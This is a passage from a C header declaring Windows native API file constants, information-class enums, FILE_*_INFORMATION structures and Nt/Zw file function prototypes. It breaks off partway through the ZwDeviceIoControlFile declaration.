1681 | #define FILE_MAXIMUM_DISPOSITION 0x00000005 1682 | #endif // File create flags 1683 | 1684 | 1685 | // Define the create/open option flags 1686 | #ifndef FILE_DIRECTORY_FILE 1687 | #define FILE_DIRECTORY_FILE 0x00000001 1688 | #define FILE_WRITE_THROUGH 0x00000002 1689 | #define FILE_SEQUENTIAL_ONLY 0x00000004 1690 | #define FILE_NO_INTERMEDIATE_BUFFERING 0x00000008 1691 | #define FILE_SYNCHRONOUS_IO_ALERT 0x00000010 1692 | #define FILE_SYNCHRONOUS_IO_NONALERT 0x00000020 1693 | #define FILE_NON_DIRECTORY_FILE 0x00000040 1694 | #define FILE_CREATE_TREE_CONNECTION 0x00000080 1695 | #define FILE_COMPLETE_IF_OPLOCKED 0x00000100 1696 | #define FILE_NO_EA_KNOWLEDGE 0x00000200 1697 | #define FILE_OPEN_FOR_RECOVERY 0x00000400 1698 | #define FILE_RANDOM_ACCESS 0x00000800 1699 | #define FILE_DELETE_ON_CLOSE 0x00001000 1700 | #define FILE_OPEN_BY_FILE_ID 0x00002000 1701 | #define FILE_OPEN_FOR_BACKUP_INTENT 0x00004000 1702 | #define FILE_NO_COMPRESSION 0x00008000 1703 | #define FILE_RESERVE_OPFILTER 0x00100000 1704 | #define FILE_OPEN_REPARSE_POINT 0x00200000 1705 | #define FILE_OPEN_NO_RECALL 0x00400000 1706 | #define FILE_OPEN_FOR_FREE_SPACE_QUERY 0x00800000 1707 | #endif // FILE_DIRECTORY_FILE 1708 | 1709 | 1710 | // 1711 | // Define the I/O status information return values for NtCreateFile/NtOpenFile 1712 | // 1713 | 1714 | #ifndef FILE_SUPERSEDED 1715 | #define FILE_SUPERSEDED 0x00000000 1716 | #define FILE_OPENED 0x00000001 1717 | #define FILE_CREATED 0x00000002 1718 | #define FILE_OVERWRITTEN 0x00000003 1719 | #define FILE_EXISTS 0x00000004 1720 | #define FILE_DOES_NOT_EXIST 0x00000005 1721 | #endif 1722 | 1723 | 1724 | #ifndef PIO_APC_ROUTINE_DEFINED 1725 | typedef 1726 | VOID 1727 | (NTAPI *PIO_APC_ROUTINE) ( 1728 | IN PVOID ApcContext, 1729 | IN PIO_STATUS_BLOCK IoStatusBlock, 1730 | IN ULONG Reserved 1731 | ); 1732 | #define PIO_APC_ROUTINE_DEFINED 1733 | #endif // PIO_APC_ROUTINE_DEFINED 1734 | 1735 | 1736 | typedef enum _FILE_INFORMATION_CLASS 1737 | { 1738 | FileDirectoryInformation = 1, 1739 | FileFullDirectoryInformation, // 2 1740 | FileBothDirectoryInformation, // 3 1741 | FileBasicInformation, // 4 wdm 1742 | FileStandardInformation, // 5 wdm 1743 | FileInternalInformation, // 6 1744 | FileEaInformation, // 7 1745 | FileAccessInformation, // 8 1746 | FileNameInformation, // 9 1747 | FileRenameInformation, // 10 1748 | FileLinkInformation, // 11 1749 | FileNamesInformation, // 12 1750 | FileDispositionInformation, // 13 1751 | FilePositionInformation, // 14 wdm 1752 | FileFullEaInformation, // 15 1753 | FileModeInformation, // 16 1754 | FileAlignmentInformation, // 17 1755 | FileAllInformation, // 18 1756 | FileAllocationInformation, // 19 1757 | FileEndOfFileInformation, // 20 wdm 1758 | FileAlternateNameInformation, // 21 1759 | FileStreamInformation, // 22 1760 | FilePipeInformation, // 23 1761 | FilePipeLocalInformation, // 24 1762 | FilePipeRemoteInformation, // 25 1763 | FileMailslotQueryInformation, // 26 1764 | FileMailslotSetInformation, // 27 1765 | FileCompressionInformation, // 28 1766 | FileObjectIdInformation, // 29 1767 | FileCompletionInformation, // 30 1768 | FileMoveClusterInformation, // 31 1769 | FileQuotaInformation, // 32 1770 | FileReparsePointInformation, // 33 1771 | FileNetworkOpenInformation, // 34 1772 | FileAttributeTagInformation, // 35 1773 | FileTrackingInformation, // 36 1774 | FileIdBothDirectoryInformation, // 37 1775 | FileIdFullDirectoryInformation, // 38 1776 | FileValidDataLengthInformation, // 39 1777 | FileShortNameInformation, // 40 1778 | FileIoCompletionNotificationInformation, // 41 1779 | FileIoStatusBlockRangeInformation, // 42 1780 | FileIoPriorityHintInformation, // 43 1781 | FileSfioReserveInformation, // 44 1782 | FileSfioVolumeInformation, // 45 1783 | FileHardLinkInformation, // 46 1784 | FileProcessIdsUsingFileInformation, // 47 1785 | FileMaximumInformation // 48 1786 | } FILE_INFORMATION_CLASS, *PFILE_INFORMATION_CLASS; 1787 | 1788 | 1789 | typedef struct _FILE_DIRECTORY_INFORMATION { 1790 | ULONG NextEntryOffset; 1791 | ULONG FileIndex; 1792 | LARGE_INTEGER CreationTime; 1793 | LARGE_INTEGER LastAccessTime; 1794 | LARGE_INTEGER LastWriteTime; 1795 | LARGE_INTEGER ChangeTime; 1796 | LARGE_INTEGER EndOfFile; 1797 | LARGE_INTEGER AllocationSize; 1798 | ULONG FileAttributes; 1799 | ULONG FileNameLength; 1800 | WCHAR FileName[1]; 1801 | } FILE_DIRECTORY_INFORMATION, *PFILE_DIRECTORY_INFORMATION; 1802 | 1803 | 1804 | typedef struct _FILE_FULL_DIR_INFORMATION { 1805 | ULONG NextEntryOffset; 1806 | ULONG FileIndex; 1807 | LARGE_INTEGER CreationTime; 1808 | LARGE_INTEGER LastAccessTime; 1809 | LARGE_INTEGER LastWriteTime; 1810 | LARGE_INTEGER ChangeTime; 1811 | LARGE_INTEGER EndOfFile; 1812 | LARGE_INTEGER AllocationSize; 1813 | ULONG FileAttributes; 1814 | ULONG FileNameLength; 1815 | ULONG EaSize; 1816 | WCHAR FileName[1]; 1817 | } FILE_FULL_DIR_INFORMATION, *PFILE_FULL_DIR_INFORMATION; 1818 | 1819 | 1820 | typedef struct _FILE_BOTH_DIR_INFORMATION { 1821 | ULONG NextEntryOffset; 1822 | ULONG FileIndex; 1823 | LARGE_INTEGER CreationTime; 1824 | LARGE_INTEGER LastAccessTime; 1825 | LARGE_INTEGER LastWriteTime; 1826 | LARGE_INTEGER ChangeTime; 1827 | LARGE_INTEGER EndOfFile; 1828 | LARGE_INTEGER AllocationSize; 1829 | ULONG FileAttributes; 1830 | ULONG FileNameLength; 1831 | ULONG EaSize; 1832 | CCHAR ShortNameLength; 1833 | WCHAR ShortName[12]; 1834 | WCHAR FileName[1]; 1835 | } FILE_BOTH_DIR_INFORMATION, *PFILE_BOTH_DIR_INFORMATION; 1836 | 1837 | 1838 | typedef struct _FILE_BASIC_INFORMATION { 1839 | LARGE_INTEGER CreationTime; 1840 | LARGE_INTEGER LastAccessTime; 1841 | LARGE_INTEGER LastWriteTime; 1842 | LARGE_INTEGER ChangeTime; 1843 | ULONG FileAttributes; 1844 | } FILE_BASIC_INFORMATION, *PFILE_BASIC_INFORMATION; 1845 | 1846 | 1847 | typedef struct _FILE_STANDARD_INFORMATION { 1848 | LARGE_INTEGER AllocationSize; 1849 | LARGE_INTEGER EndOfFile; 1850 | ULONG NumberOfLinks; 1851 | BOOLEAN DeletePending; 1852 | BOOLEAN Directory; 1853 | } FILE_STANDARD_INFORMATION, *PFILE_STANDARD_INFORMATION; 1854 | 1855 | 1856 | typedef struct _FILE_INTERNAL_INFORMATION { 1857 | LARGE_INTEGER IndexNumber; 1858 | } FILE_INTERNAL_INFORMATION, *PFILE_INTERNAL_INFORMATION; 1859 | 1860 | 1861 | typedef struct _FILE_EA_INFORMATION { 1862 | ULONG EaSize; 1863 | } FILE_EA_INFORMATION, *PFILE_EA_INFORMATION; 1864 | 1865 | 1866 | typedef struct _FILE_ACCESS_INFORMATION { 1867 | ACCESS_MASK AccessFlags; 1868 | } FILE_ACCESS_INFORMATION, *PFILE_ACCESS_INFORMATION; 1869 | 1870 | 1871 | typedef struct _FILE_NAME_INFORMATION { 1872 | ULONG FileNameLength; 1873 | WCHAR FileName[1]; 1874 | } FILE_NAME_INFORMATION, *PFILE_NAME_INFORMATION; 1875 | 1876 | 1877 | typedef struct _FILE_RENAME_INFORMATION { 1878 | BOOLEAN ReplaceIfExists; 1879 | HANDLE RootDirectory; 1880 | ULONG FileNameLength; 1881 | WCHAR FileName[1]; 1882 | } FILE_RENAME_INFORMATION, *PFILE_RENAME_INFORMATION; 1883 | 1884 | 1885 | typedef struct _FILE_NAMES_INFORMATION { 1886 | ULONG NextEntryOffset; 1887 | ULONG FileIndex; 1888 | ULONG FileNameLength; 1889 | WCHAR FileName[1]; 1890 | } FILE_NAMES_INFORMATION, *PFILE_NAMES_INFORMATION; 1891 | 1892 | 1893 | typedef struct _FILE_DISPOSITION_INFORMATION { 1894 | BOOLEAN DeleteFile; 1895 | } FILE_DISPOSITION_INFORMATION, *PFILE_DISPOSITION_INFORMATION; 1896 | 1897 | 1898 | typedef struct _FILE_POSITION_INFORMATION { 1899 | LARGE_INTEGER CurrentByteOffset; 1900 | } FILE_POSITION_INFORMATION, *PFILE_POSITION_INFORMATION; 1901 | 1902 | 1903 | typedef struct _FILE_FULL_EA_INFORMATION { 1904 | ULONG NextEntryOffset; 1905 | UCHAR Flags; 1906 | UCHAR EaNameLength; 1907 | USHORT EaValueLength; 1908 | CHAR EaName[1]; 1909 | } FILE_FULL_EA_INFORMATION, *PFILE_FULL_EA_INFORMATION; 1910 | 1911 | 1912 | typedef struct _FILE_MODE_INFORMATION { 1913 | ULONG Mode; 1914 | } FILE_MODE_INFORMATION, *PFILE_MODE_INFORMATION; 1915 | 1916 | 1917 | typedef struct _FILE_ALIGNMENT_INFORMATION { 1918 | ULONG AlignmentRequirement; 1919 | } FILE_ALIGNMENT_INFORMATION, *PFILE_ALIGNMENT_INFORMATION; 1920 | 1921 | 1922 | typedef struct _FILE_ALL_INFORMATION { 1923 | FILE_BASIC_INFORMATION BasicInformation; 1924 | FILE_STANDARD_INFORMATION StandardInformation; 1925 | FILE_INTERNAL_INFORMATION InternalInformation; 1926 | FILE_EA_INFORMATION EaInformation; 1927 | FILE_ACCESS_INFORMATION AccessInformation; 1928 | FILE_POSITION_INFORMATION PositionInformation; 1929 | FILE_MODE_INFORMATION ModeInformation; 1930 | FILE_ALIGNMENT_INFORMATION AlignmentInformation; 1931 | FILE_NAME_INFORMATION NameInformation; 1932 | } FILE_ALL_INFORMATION, *PFILE_ALL_INFORMATION; 1933 | 1934 | 1935 | typedef struct _FILE_ALLOCATION_INFORMATION { 1936 | LARGE_INTEGER AllocationSize; 1937 | } FILE_ALLOCATION_INFORMATION, *PFILE_ALLOCATION_INFORMATION; 1938 | 1939 | 1940 | typedef struct _FILE_END_OF_FILE_INFORMATION { 1941 | LARGE_INTEGER EndOfFile; 1942 | } FILE_END_OF_FILE_INFORMATION, *PFILE_END_OF_FILE_INFORMATION; 1943 | 1944 | 1945 | typedef struct _FILE_STREAM_INFORMATION { 1946 | ULONG NextEntryOffset; 1947 | ULONG StreamNameLength; 1948 | LARGE_INTEGER StreamSize; 1949 | LARGE_INTEGER StreamAllocationSize; 1950 | WCHAR StreamName[1]; 1951 | } FILE_STREAM_INFORMATION, *PFILE_STREAM_INFORMATION; 1952 | 1953 | typedef struct _FILE_PIPE_INFORMATION { 1954 | ULONG ReadMode; 1955 | ULONG CompletionMode; 1956 | } FILE_PIPE_INFORMATION, *PFILE_PIPE_INFORMATION; 1957 | 1958 | 1959 | typedef struct _FILE_PIPE_LOCAL_INFORMATION { 1960 | ULONG NamedPipeType; 1961 | ULONG NamedPipeConfiguration; 1962 | ULONG MaximumInstances; 1963 | ULONG CurrentInstances; 1964 | ULONG InboundQuota; 1965 | ULONG ReadDataAvailable; 1966 | ULONG OutboundQuota; 1967 | ULONG WriteQuotaAvailable; 1968 | ULONG NamedPipeState; 1969 | ULONG NamedPipeEnd; 1970 | } FILE_PIPE_LOCAL_INFORMATION, *PFILE_PIPE_LOCAL_INFORMATION; 1971 | 1972 | 1973 | typedef struct _FILE_PIPE_REMOTE_INFORMATION { 1974 | LARGE_INTEGER CollectDataTime; 1975 | ULONG MaximumCollectionCount; 1976 | } FILE_PIPE_REMOTE_INFORMATION, *PFILE_PIPE_REMOTE_INFORMATION; 1977 | 1978 | 1979 | typedef struct _FILE_MAILSLOT_QUERY_INFORMATION { 1980 | ULONG MaximumMessageSize; 1981 | ULONG MailslotQuota; 1982 | ULONG NextMessageSize; 1983 | ULONG MessagesAvailable; 1984 | LARGE_INTEGER ReadTimeout; 1985 | } FILE_MAILSLOT_QUERY_INFORMATION, *PFILE_MAILSLOT_QUERY_INFORMATION; 1986 | 1987 | 1988 | typedef struct _FILE_MAILSLOT_SET_INFORMATION { 1989 | PLARGE_INTEGER ReadTimeout; 1990 | } FILE_MAILSLOT_SET_INFORMATION, *PFILE_MAILSLOT_SET_INFORMATION; 1991 | 1992 | 1993 | typedef struct _FILE_COMPRESSION_INFORMATION { 1994 | LARGE_INTEGER CompressedFileSize; 1995 | USHORT CompressionFormat; 1996 | UCHAR CompressionUnitShift; 1997 | UCHAR ChunkShift; 1998 | UCHAR ClusterShift; 1999 | UCHAR Reserved[3]; 2000 | } FILE_COMPRESSION_INFORMATION, *PFILE_COMPRESSION_INFORMATION; 2001 | 2002 | 2003 | typedef struct _FILE_LINK_INFORMATION { 2004 | BOOLEAN ReplaceIfExists; 2005 | HANDLE RootDirectory; 2006 | ULONG FileNameLength; 2007 | WCHAR FileName[1]; 2008 | } FILE_LINK_INFORMATION, *PFILE_LINK_INFORMATION; 2009 | 2010 | 2011 | typedef struct _FILE_OBJECTID_INFORMATION 2012 | { 2013 | LONGLONG FileReference; 2014 | UCHAR ObjectId[16]; 2015 | union { 2016 | struct { 2017 | UCHAR BirthVolumeId[16]; 2018 | UCHAR BirthObjectId[16]; 2019 | UCHAR DomainId[16]; 2020 | } ; 2021 | UCHAR ExtendedInfo[48]; 2022 | }; 2023 | } FILE_OBJECTID_INFORMATION, *PFILE_OBJECTID_INFORMATION; 2024 | 2025 | 2026 | typedef struct _FILE_COMPLETION_INFORMATION { 2027 | HANDLE Port; 2028 | PVOID Key; 2029 | } FILE_COMPLETION_INFORMATION, *PFILE_COMPLETION_INFORMATION; 2030 | 2031 | 2032 | typedef struct _FILE_MOVE_CLUSTER_INFORMATION { 2033 | ULONG ClusterCount; 2034 | HANDLE RootDirectory; 2035 | ULONG FileNameLength; 2036 | WCHAR FileName[1]; 2037 | } FILE_MOVE_CLUSTER_INFORMATION, *PFILE_MOVE_CLUSTER_INFORMATION; 2038 | 2039 | 2040 | typedef struct _FILE_NETWORK_OPEN_INFORMATION { 2041 | LARGE_INTEGER CreationTime; 2042 | LARGE_INTEGER LastAccessTime; 2043 | LARGE_INTEGER LastWriteTime; 2044 | LARGE_INTEGER ChangeTime; 2045 | LARGE_INTEGER AllocationSize; 2046 | LARGE_INTEGER EndOfFile; 2047 | ULONG FileAttributes; 2048 | } FILE_NETWORK_OPEN_INFORMATION, *PFILE_NETWORK_OPEN_INFORMATION; 2049 | 2050 | 2051 | typedef struct _FILE_ATTRIBUTE_TAG_INFORMATION { 2052 | ULONG FileAttributes; 2053 | ULONG ReparseTag; 2054 | } FILE_ATTRIBUTE_TAG_INFORMATION, *PFILE_ATTRIBUTE_TAG_INFORMATION; 2055 | 2056 | 2057 | typedef struct _FILE_TRACKING_INFORMATION { 2058 | HANDLE DestinationFile; 2059 | ULONG ObjectInformationLength; 2060 | CHAR ObjectInformation[1]; 2061 | } FILE_TRACKING_INFORMATION, *PFILE_TRACKING_INFORMATION; 2062 | 2063 | 2064 | typedef struct _FILE_REPARSE_POINT_INFORMATION { 2065 | LONGLONG FileReference; 2066 | ULONG Tag; 2067 | } FILE_REPARSE_POINT_INFORMATION, *PFILE_REPARSE_POINT_INFORMATION; 2068 | 2069 | 2070 | typedef struct _FILE_QUOTA_INFORMATION { 2071 | ULONG NextEntryOffset; 2072 | ULONG SidLength; 2073 | LARGE_INTEGER ChangeTime; 2074 | LARGE_INTEGER QuotaUsed; 2075 | LARGE_INTEGER QuotaThreshold; 2076 | LARGE_INTEGER QuotaLimit; 2077 | SID Sid; 2078 | } FILE_QUOTA_INFORMATION, *PFILE_QUOTA_INFORMATION; 2079 | 2080 | 2081 | typedef struct _FILE_ID_BOTH_DIR_INFORMATION { 2082 | ULONG NextEntryOffset; 2083 | ULONG FileIndex; 2084 | LARGE_INTEGER CreationTime; 2085 | LARGE_INTEGER LastAccessTime; 2086 | LARGE_INTEGER LastWriteTime; 2087 | LARGE_INTEGER ChangeTime; 2088 | LARGE_INTEGER EndOfFile; 2089 | LARGE_INTEGER AllocationSize; 2090 | ULONG FileAttributes; 2091 | ULONG FileNameLength; 2092 | ULONG EaSize; 2093 | CCHAR ShortNameLength; 2094 | WCHAR ShortName[12]; 2095 | LARGE_INTEGER FileId; 2096 | WCHAR FileName[1]; 2097 | } FILE_ID_BOTH_DIR_INFORMATION, *PFILE_ID_BOTH_DIR_INFORMATION; 2098 | 2099 | 2100 | typedef struct _FILE_ID_FULL_DIR_INFORMATION { 2101 | ULONG NextEntryOffset; 2102 | ULONG FileIndex; 2103 | LARGE_INTEGER CreationTime; 2104 | LARGE_INTEGER LastAccessTime; 2105 | LARGE_INTEGER LastWriteTime; 2106 | LARGE_INTEGER ChangeTime; 2107 | LARGE_INTEGER EndOfFile; 2108 | LARGE_INTEGER AllocationSize; 2109 | ULONG FileAttributes; 2110 | ULONG FileNameLength; 2111 | ULONG EaSize; 2112 | LARGE_INTEGER FileId; 2113 | WCHAR FileName[1]; 2114 | } FILE_ID_FULL_DIR_INFORMATION, *PFILE_ID_FULL_DIR_INFORMATION; 2115 | 2116 | 2117 | typedef struct _FILE_VALID_DATA_LENGTH_INFORMATION { 2118 | LARGE_INTEGER ValidDataLength; 2119 | } FILE_VALID_DATA_LENGTH_INFORMATION, *PFILE_VALID_DATA_LENGTH_INFORMATION; 2120 | 2121 | typedef struct _FILE_LINK_ENTRY_INFORMATION { 2122 | ULONG NextEntryOffset; 2123 | LONGLONG ParentFileId; 2124 | ULONG FileNameLength; 2125 | WCHAR FileName[1]; 2126 | } FILE_LINK_ENTRY_INFORMATION, *PFILE_LINK_ENTRY_INFORMATION; 2127 | 2128 | typedef struct _FILE_LINKS_INFORMATION { 2129 | ULONG BytesNeeded; 2130 | ULONG EntriesReturned; 2131 | FILE_LINK_ENTRY_INFORMATION Entry; 2132 | } FILE_LINKS_INFORMATION, *PFILE_LINKS_INFORMATION; 2133 | 2134 | 2135 | 2136 | typedef enum _FSINFOCLASS { 2137 | FileFsVolumeInformation = 1, 2138 | FileFsLabelInformation, // 2 2139 | FileFsSizeInformation, // 3 2140 | FileFsDeviceInformation, // 4 2141 | FileFsAttributeInformation, // 5 2142 | FileFsControlInformation, // 6 2143 | FileFsFullSizeInformation, // 7 2144 | FileFsObjectIdInformation, // 8 2145 | FileFsDriverPathInformation, // 9 2146 | FileFsMaximumInformation 2147 | } FS_INFORMATION_CLASS, *PFS_INFORMATION_CLASS; 2148 | 2149 | 2150 | NTSYSAPI 2151 | NTSTATUS 2152 | NTAPI 2153 | NtCreateFile( 2154 | OUT PHANDLE FileHandle, 2155 | IN ACCESS_MASK DesiredAccess, 2156 | IN POBJECT_ATTRIBUTES ObjectAttributes, 2157 | OUT PIO_STATUS_BLOCK IoStatusBlock, 2158 | IN PLARGE_INTEGER AllocationSize, 2159 | IN ULONG FileAttributes, 2160 | IN ULONG ShareAccess, 2161 | IN ULONG CreateDisposition, 2162 | IN ULONG CreateOptions, 2163 | IN PVOID EaBuffer, 2164 | IN ULONG EaLength); 2165 | 2166 | 2167 | NTSYSAPI 2168 | NTSTATUS 2169 | NTAPI 2170 | ZwCreateFile( 2171 | OUT PHANDLE FileHandle, 2172 | IN ACCESS_MASK DesiredAccess, 2173 | IN POBJECT_ATTRIBUTES ObjectAttributes, 2174 | OUT PIO_STATUS_BLOCK IoStatusBlock, 2175 | IN PLARGE_INTEGER AllocationSize, 2176 | IN ULONG FileAttributes, 2177 | IN ULONG ShareAccess, 2178 | IN ULONG CreateDisposition, 2179 | IN ULONG CreateOptions, 2180 | IN PVOID EaBuffer, 2181 | IN ULONG EaLength); 2182 | 2183 | 2184 | NTSYSAPI 2185 | NTSTATUS 2186 | NTAPI 2187 | NtOpenFile( 2188 | OUT PHANDLE FileHandle, 2189 | IN ACCESS_MASK DesiredAccess, 2190 | IN POBJECT_ATTRIBUTES ObjectAttributes, 2191 | OUT PIO_STATUS_BLOCK IoStatusBlock, 2192 | IN ULONG ShareAccess, 2193 | IN ULONG OpenOptions 2194 | ); 2195 | 2196 | 2197 | NTSYSAPI 2198 | NTSTATUS 2199 | NTAPI 2200 | ZwOpenFile( 2201 | OUT PHANDLE FileHandle, 2202 | IN ACCESS_MASK DesiredAccess, 2203 | IN POBJECT_ATTRIBUTES ObjectAttributes, 2204 | OUT PIO_STATUS_BLOCK IoStatusBlock, 2205 | IN ULONG ShareAccess, 2206 | IN ULONG OpenOptions 2207 | ); 2208 | 2209 | 2210 | NTSYSAPI 2211 | NTSTATUS 2212 | NTAPI 2213 | NtQueryInformationFile( 2214 | IN HANDLE FileHandle, 2215 | OUT PIO_STATUS_BLOCK IoStatusBlock, 2216 | OUT PVOID FileInformation, 2217 | IN ULONG Length, 2218 | IN FILE_INFORMATION_CLASS FileInformationClass 2219 | ); 2220 | 2221 | 2222 | NTSYSAPI 2223 | NTSTATUS 2224 | NTAPI 2225 | ZwQueryInformationFile( 2226 | IN HANDLE FileHandle, 2227 | OUT PIO_STATUS_BLOCK IoStatusBlock, 2228 | OUT PVOID FileInformation, 2229 | IN ULONG Length, 2230 | IN FILE_INFORMATION_CLASS FileInformationClass 2231 | ); 2232 | 2233 | 2234 | NTSYSAPI 2235 | NTSTATUS 2236 | NTAPI 2237 | NtQueryDirectoryFile( 2238 | IN HANDLE FileHandle, 2239 | IN HANDLE Event OPTIONAL, 2240 | IN PIO_APC_ROUTINE ApcRoutine OPTIONAL, 2241 | IN PVOID ApcContext OPTIONAL, 2242 | OUT PIO_STATUS_BLOCK IoStatusBlock, 2243 | OUT PVOID FileInformation, 2244 | IN ULONG Length, 2245 | IN FILE_INFORMATION_CLASS FileInformationClass, 2246 | IN BOOLEAN ReturnSingleEntry, 2247 | IN PUNICODE_STRING FileName OPTIONAL, 2248 | IN BOOLEAN RestartScan 2249 | ); 2250 | 2251 | 2252 | NTSYSAPI 2253 | NTSTATUS 2254 | NTAPI 2255 | ZwQueryDirectoryFile( 2256 | IN HANDLE FileHandle, 2257 | IN HANDLE Event OPTIONAL, 2258 | IN PIO_APC_ROUTINE ApcRoutine OPTIONAL, 2259 | IN PVOID ApcContext OPTIONAL, 2260 | OUT PIO_STATUS_BLOCK IoStatusBlock, 2261 | OUT PVOID FileInformation, 2262 | IN ULONG Length, 2263 | IN FILE_INFORMATION_CLASS FileInformationClass, 2264 | IN BOOLEAN ReturnSingleEntry, 2265 | IN PUNICODE_STRING FileName OPTIONAL, 2266 | IN BOOLEAN RestartScan 2267 | ); 2268 | 2269 | 2270 | NTSYSAPI 2271 | NTSTATUS 2272 | NTAPI 2273 | NtQueryVolumeInformationFile( 2274 | IN HANDLE FileHandle, 2275 | OUT PIO_STATUS_BLOCK IoStatusBlock, 2276 | OUT PVOID FsInformation, 2277 | IN ULONG Length, 2278 | IN FS_INFORMATION_CLASS FsInformationClass 2279 | ); 2280 | 2281 | 2282 | NTSYSAPI 2283 | NTSTATUS 2284 | NTAPI 2285 | ZwQueryVolumeInformationFile( 2286 | IN HANDLE FileHandle, 2287 | OUT PIO_STATUS_BLOCK IoStatusBlock, 2288 | OUT PVOID FsInformation, 2289 | IN ULONG Length, 2290 | IN FS_INFORMATION_CLASS FsInformationClass 2291 | ); 2292 | 2293 | 2294 | NTSYSAPI 2295 | NTSTATUS 2296 | NTAPI 2297 | NtSetInformationFile( 2298 | IN HANDLE FileHandle, 2299 | OUT PIO_STATUS_BLOCK IoStatusBlock, 2300 | IN PVOID FileInformation, 2301 | IN ULONG Length, 2302 | IN FILE_INFORMATION_CLASS FileInformationClass 2303 | ); 2304 | 2305 | 2306 | NTSYSAPI 2307 | NTSTATUS 2308 | NTAPI 2309 | ZwSetInformationFile( 2310 | IN HANDLE FileHandle, 2311 | OUT PIO_STATUS_BLOCK IoStatusBlock, 2312 | IN PVOID FileInformation, 2313 | IN ULONG Length, 2314 | IN FILE_INFORMATION_CLASS FileInformationClass 2315 | ); 2316 | 2317 | 2318 | NTSYSAPI 2319 | NTSTATUS 2320 | NTAPI 2321 | NtQueryEaFile( 2322 | IN HANDLE FileHandle, 2323 | OUT PIO_STATUS_BLOCK IoStatusBlock, 2324 | OUT PVOID Buffer, 2325 | IN ULONG Length, 2326 | IN BOOLEAN ReturnSingleEntry, 2327 | IN PVOID EaList OPTIONAL, 2328 | IN ULONG EaListLength, 2329 | IN PULONG EaIndex OPTIONAL, 2330 | IN BOOLEAN RestartScan); 2331 | 2332 | 2333 | NTSYSAPI 2334 | NTSTATUS 2335 | NTAPI 2336 | ZwQueryEaFile( 2337 | IN HANDLE FileHandle, 2338 | OUT PIO_STATUS_BLOCK IoStatusBlock, 2339 | OUT PVOID Buffer, 2340 | IN ULONG Length, 2341 | IN BOOLEAN ReturnSingleEntry, 2342 | IN PVOID EaList OPTIONAL, 2343 | IN ULONG EaListLength, 2344 | IN PULONG EaIndex OPTIONAL, 2345 | IN BOOLEAN RestartScan); 2346 | 2347 | 2348 | NTSYSAPI 2349 | NTSTATUS 2350 | NTAPI 2351 | NtSetEaFile( 2352 | IN HANDLE FileHandle, 2353 | OUT PIO_STATUS_BLOCK IoStatusBlock, 2354 | IN PVOID Buffer, 2355 | IN ULONG Length); 2356 | 2357 | 2358 | NTSYSAPI 2359 | NTSTATUS 2360 | NTAPI 2361 | ZwSetEaFile( 2362 | IN HANDLE FileHandle, 2363 | OUT PIO_STATUS_BLOCK IoStatusBlock, 2364 | IN PVOID Buffer, 2365 | IN ULONG Length); 2366 | 2367 | 2368 | NTSYSAPI 2369 | NTSTATUS 2370 | NTAPI 2371 | NtReadFile( 2372 | IN HANDLE FileHandle, 2373 | IN HANDLE Event OPTIONAL, 2374 | IN PIO_APC_ROUTINE ApcRoutine OPTIONAL, 2375 | IN PVOID ApcContext OPTIONAL, 2376 | OUT PIO_STATUS_BLOCK IoStatusBlock, 2377 | OUT PVOID Buffer, 2378 | IN ULONG Length, 2379 | IN PLARGE_INTEGER ByteOffset OPTIONAL, 2380 | IN PULONG Key OPTIONAL 2381 | ); 2382 | 2383 | 2384 | NTSYSAPI 2385 | NTSTATUS 2386 | NTAPI 2387 | ZwReadFile( 2388 | IN HANDLE FileHandle, 2389 | IN HANDLE Event OPTIONAL, 2390 | IN PIO_APC_ROUTINE ApcRoutine OPTIONAL, 2391 | IN PVOID ApcContext OPTIONAL, 2392 | OUT PIO_STATUS_BLOCK IoStatusBlock, 2393 | OUT PVOID Buffer, 2394 | IN ULONG Length, 2395 | IN PLARGE_INTEGER ByteOffset OPTIONAL, 2396 | IN PULONG Key OPTIONAL 2397 | ); 2398 | 2399 | 2400 | NTSYSAPI 2401 | NTSTATUS 2402 | NTAPI 2403 | NtWriteFile( 2404 | IN HANDLE FileHandle, 2405 | IN HANDLE Event OPTIONAL, 2406 | IN PIO_APC_ROUTINE ApcRoutine OPTIONAL, 2407 | IN PVOID ApcContext OPTIONAL, 2408 | OUT PIO_STATUS_BLOCK IoStatusBlock, 2409 | IN PVOID Buffer, 2410 | IN ULONG Length, 2411 | IN PLARGE_INTEGER ByteOffset OPTIONAL, 2412 | IN PULONG Key OPTIONAL 2413 | ); 2414 | 2415 | 2416 | NTSYSAPI 2417 | NTSTATUS 2418 | NTAPI 2419 | ZwWriteFile( 2420 | IN HANDLE FileHandle, 2421 | IN HANDLE Event OPTIONAL, 2422 | IN PIO_APC_ROUTINE ApcRoutine OPTIONAL, 2423 | IN PVOID ApcContext OPTIONAL, 2424 | OUT PIO_STATUS_BLOCK IoStatusBlock, 2425 | IN PVOID Buffer, 2426 | IN ULONG Length, 2427 | IN PLARGE_INTEGER ByteOffset OPTIONAL, 2428 | IN PULONG Key OPTIONAL 2429 | ); 2430 | 2431 | 2432 | NTSYSAPI 2433 | NTSTATUS 2434 | NTAPI 2435 | NtDeleteFile( 2436 | IN POBJECT_ATTRIBUTES ObjectAttributes 2437 | ); 2438 | 2439 | 2440 | NTSYSAPI 2441 | NTSTATUS 2442 | NTAPI 2443 | ZwDeleteFile( 2444 | IN POBJECT_ATTRIBUTES ObjectAttributes 2445 | ); 2446 | 2447 | 2448 | NTSYSAPI 2449 | NTSTATUS 2450 | NTAPI 2451 | NtFlushBuffersFile( 2452 | IN HANDLE FileHandle, 2453 | OUT PIO_STATUS_BLOCK IoStatusBlock 2454 | ); 2455 | 2456 | 2457 | NTSYSAPI 2458 | NTSTATUS 2459 | NTAPI 2460 | ZwFlushBuffersFile( 2461 | IN HANDLE FileHandle, 2462 | OUT PIO_STATUS_BLOCK IoStatusBlock 2463 | ); 2464 | 2465 | 2466 | NTSYSAPI 2467 | NTSTATUS 2468 | NTAPI 2469 | NtDeviceIoControlFile( 2470 | IN HANDLE FileHandle, 2471 | IN HANDLE Event, 2472 | IN PIO_APC_ROUTINE ApcRoutine, 2473 | IN PVOID ApcContext, 2474 | OUT PIO_STATUS_BLOCK IoStatusBlock, 2475 | IN ULONG IoControlCode, 2476 | IN PVOID InputBuffer, 2477 | IN ULONG InputBufferLength, 2478 | IN PVOID OutputBuffer, 2479 | IN ULONG OutputBufferLength 2480 | ); 2481 | 2482 | 2483 | NTSYSAPI 2484 | NTSTATUS 2485 | NTAPI 2486 | ZwDeviceIoControlFile( 2487 | IN HANDLE FileHandle, 2488 | IN HANDLE Event, 2489 | IN PIO_APC_ROUTINE ApcRoutine, 2490 | IN PVOID ApcContext, 2491 | OUT PIO_STATUS_BLOCK IoStatusBlock, 2492 | IN ULONG IoControlCode, 2493 | IN PVOID InputBuffer, 